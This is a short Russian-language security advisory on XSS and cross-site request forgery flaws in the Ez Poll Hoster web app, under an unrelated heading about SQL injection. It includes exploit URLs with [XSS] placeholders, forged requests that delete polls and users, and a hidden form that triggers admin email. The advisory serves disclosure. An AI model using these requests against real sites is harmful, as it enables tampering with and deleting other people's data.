Xakep #305. Многошаговые SQL-инъекции
Программа: Ez Poll Hoster
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "pid" сценарием index.php (если "action" установлен в "code")
и в параметре "uid" (если "action" установлен в "view"). Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.
Эксплоит:
http://localhost/eph/index.php?action=code&pid=[XSS]
http://localhost/eph/index.php?action=delete_poll&pid=[POLL
NAME]&do=true&is_js_confirmed=1
http://localhost/eph/profile.php?action=view&uid=[XSS]
http://localhost/eph/admin.php?action=manage&do=delete&uid=[USER
NAME]&is_js_confirmed=1
<form action="http://localhost/eph/admin.php?action=email&do=true"
method="post">
<input type="hidden" name="subject" value="this is my subject">
<input type="hidden" name="message" value="this is my message">
<input type="submit" name="submit" value="Submit">
</form>